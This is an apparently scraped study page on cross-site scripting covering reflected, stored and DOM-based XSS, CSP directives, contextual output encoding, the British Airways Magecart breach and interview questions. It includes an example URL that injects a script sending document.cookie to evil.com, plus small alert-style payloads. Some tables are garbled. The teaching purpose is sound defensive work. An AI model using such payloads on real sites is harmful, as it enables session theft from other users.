InfoSec Notes
Complete guide to XSS vulnerabilities including reflected, stored, and DOM-based XSS attacks with prevention techniques, CSP headers, and practical exploitation examples.
What is XSS?
Cross-Site Scripting (XSS) is a vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. When a victim's browser executes the injected script, it runs with the privileges of the vulnerable website, allowing the attacker to steal session cookies, redirect users, or perform actions on their behalf.
Types of XSS
| Attacker | Crafts malicious URL → Victim clicks link → |
| Server reflects input in response | Browser executes script |
| Example URL | https://site.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script> |
| Attacker | Submits malicious script (e.g., comment/profile) → |
| Server stores in database | All users viewing page get infected |
| Most dangerous | affects all visitors, no user interaction needed |
| Attacker | Crafts URL with payload → JavaScript reads URL → |
Attack Examples
Content Security Policy (CSP)
CSP is the most effective defense against XSS:
| img-src 'self' data | https:; |
| connect-src 'self' https | //api.example.com; |
| script-src 'self' | Only allow scripts from same origin |
| 'nonce-abc123' | Only inline scripts with matching nonce |
| 'strict-dynamic' | Trust scripts loaded by trusted scripts |
| object-src 'none' | Block Flash/Java plugins |
| base-uri 'self' | Prevent base tag injection |
XSS Prevention Checklist
| Context | Encoding Required | Example |
|---|---|---|
| HTML body | HTML entity encoding | <script> |
| HTML attribute | Attribute encoding | "onclick=alert(1) |
| JavaScript | JavaScript encoding | \x3cscript\x3e |
| URL parameter | URL encoding | %3Cscript%3E |
| CSS value | CSS encoding | \3c script\3e |
Real-World XSS Case: British Airways (2018)
Attack: Magecart group injected a skimming script into BA's payment page via XSS in a third-party JavaScript library.
Impact: 380,000 payment card details stolen over 15 days.
Fine: £20 million GDPR penalty from ICO.
Lesson: Subresource Integrity (SRI) and CSP would have prevented the third-party script modification.
Interview Questions
- What is the difference between reflected, stored, and DOM-based XSS?
- Reflected: payload in request, reflected in response (requires victim to click link). Stored: payload saved in database, served to all visitors (most dangerous). DOM-based: payload processed entirely by client-side JavaScript without touching the server.
- How does Content Security Policy prevent XSS?
- CSP restricts which scripts can execute. With
script-src 'self', even if an attacker injects a<script>tag, the browser refuses to execute inline scripts not matching the nonce. It blocks the execution, not the injection.
- Why is output encoding preferred over input filtering for XSS prevention?
- Input filtering can be bypassed with encoding tricks and doesn't account for all output contexts. Output encoding (contextual) transforms characters right before rendering, ensuring they're treated as data not code regardless of how they were stored.
- What is DOM clobbering and how does it relate to XSS?
- DOM clobbering uses HTML elements with specific IDs/names to overwrite JavaScript global variables. If code accesses
window.someVarand an attacker injects<form id="someVar"><input name="action" value="javascript:alert(1)">, it can lead to XSS without traditional script injection.
- Explain Subresource Integrity (SRI) and when to use it.
- SRI adds a cryptographic hash to script/link tags:
<script src="lib.js" integrity="sha384-abc...">. The browser verifies the file matches the hash before executing. Use for all third-party resources to prevent supply-chain XSS if the CDN is compromised.
Exam Focus
Revise definitions, diagrams, examples, and short-answer points for Cross-Site Scripting (XSS).
Interview Use
Prepare one clear explanation, one practical example, and one common mistake for this Information Security topic.
Search Terms
information-security, information security, information, security, web, cross, site, scripting
Related Information Security Topics